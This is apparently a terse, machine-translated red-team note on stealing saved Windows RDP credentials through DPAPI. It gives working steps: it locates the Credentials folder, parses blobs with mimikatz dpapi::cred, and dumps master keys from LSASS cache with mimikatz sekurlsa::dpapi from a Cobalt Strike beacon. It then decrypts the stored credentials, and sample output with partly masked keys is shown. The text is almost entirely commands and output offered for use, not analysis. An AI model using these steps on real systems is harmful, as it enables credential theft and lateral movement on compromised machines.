Here only records not explain
Windows directory is saved RDP credentials:
C:\Users\用户名\AppData\Local\Microsoft\Credentials
Available through the command line, execute:
cmdkey /list或powerpick Get-ChildItem C:\Users\Administrator\AppData\Local\Microsoft\Credentials\ -Force
Note: cmdkey / list command Always perform under Session session, under the system perform without result.
Using cobalt strike in mimikatz can use to get next part of masterkey and pbData:
mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID
Output should look like:
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000012 - 18
szDescription : 本地凭据数据
algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : 726d845b8a4eba29875****10659ec2d5e210a48f
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : cda4760ed3fb1c7874****28973f5b5b403fe31f233
dwDataLen : 000000c0 - 192
pbData : d268f81c64a3867cd7e96d99578295ea55a47fcaad5f7dd6678989117fc565906cc5a8bfd37137171302b34611ba5****e0b94ae399f9883cf80050f0972693d72b35a9a90918a06d
dwSignLen : 00000040 - 64
pbSign : 63239d3169c99fd82404c0e230****37504cfa332bea4dca0655
Concern is guidMasterKey, pbData, pbData is we have to decrypt the data, guidMasterKey is the key needed to decrypt it.
Here there has been LSASS this key in its cache so we can use SeDebugPrivilege get:
beacon> mimikatz !sekurlsa::dpapi
[00000001]
* GUID : {0785cf41-0f53-4be7-bc8b-6cb33b4bb102}
* Time : 2020/1/3 8:05:02
* MasterKey : 02b598c2252fa5d8f7fcd***7737644186223f44cb7d958148
* sha1(key) : 3e6dc57a0fe****a902cfaf617b1322
[00000002]
* GUID : {edcb491a-91d7-4d98-a714-8bc60254179f}
* Time : 2020/1/3 8:05:02
* MasterKey : c17a4aa87e9848e9f46c8ca81330***79381103f4137d3d97fe202
* sha1(key) : 5e1b3eb1152d3****6d3d6f90aaeb
Then save credentials to the local, execute:
mimikatz "dpapi::cred /in:C:\Users\USERNAME\Desktop\test\SESSION /masterkey:对应的GUID key"